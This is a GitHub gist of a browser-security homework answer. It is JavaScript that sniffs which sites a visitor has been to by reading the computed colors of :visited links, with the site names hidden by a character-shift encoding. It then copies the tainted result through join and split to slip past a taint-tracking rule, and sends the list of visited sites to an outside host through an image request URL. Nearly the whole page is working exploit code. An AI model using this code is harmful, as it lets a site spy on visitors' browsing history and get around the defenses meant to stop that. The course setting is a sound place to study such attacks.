Skip to content

Instantly share code, notes, and snippets.

@chinmaygarde
Created November 15, 2011 09:08
Show Gist options
  • Save chinmaygarde/1366518 to your computer and use it in GitHub Desktop.
Save chinmaygarde/1366518 to your computer and use it in GitHub Desktop.
Browser Security Homework 3. Bypassing TSET.
// The rule is:
/*
* at $1:getCompStyle($2; ...) if $2:isLink() inject "secret"
* at document:send($1; $2) block "secret" on $2
*/
var k = { 0: "qpsoivc/dpn", "sfeuvcf/dpn", ... };
var g = [];
for(var m in k) {
var d = k[m];
var a = "";
for(var f = 0; f < d.length; f++) {
a += String.fromCharCode(d.charCodeAt(f)-1)
}
var h = false;
for(var j in {"http://":"","http://www.":""}) {
var l = document.createElement("a");
l.href = j + a;
document.getElementById("ol").appendChild(l);
var e = "";
e = document.defaultView.getComputedStyle(l, null).getPropertyValue("color") // Tainted
if(e == "rgb(12, 34, 56)" || e == "rgb(12,34,56)") { h = true } // Tainted
}
if(h) { g.push(m) } // Tainted
}
// g is tainted. My goal is to create an untainted array which is a copy of g
var str = g.join(","); // Because of the incompleteness of the engine described, str will be untainted
var untainted_array = str.split(","); // Voila, we have an untainted array which is a copy of g
var b = (untainted_array instanceof Array)? untainted_array.join(",") : ""; // Untainted, same as original
var c = document.createElement("img"); // Untainted, same as original
c.src= "http://ol.youporn.com/blank.gif?id="+b; // Untainted, same as original
document.getElementById("ol").appendChild(c); // Untainted, same as original
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment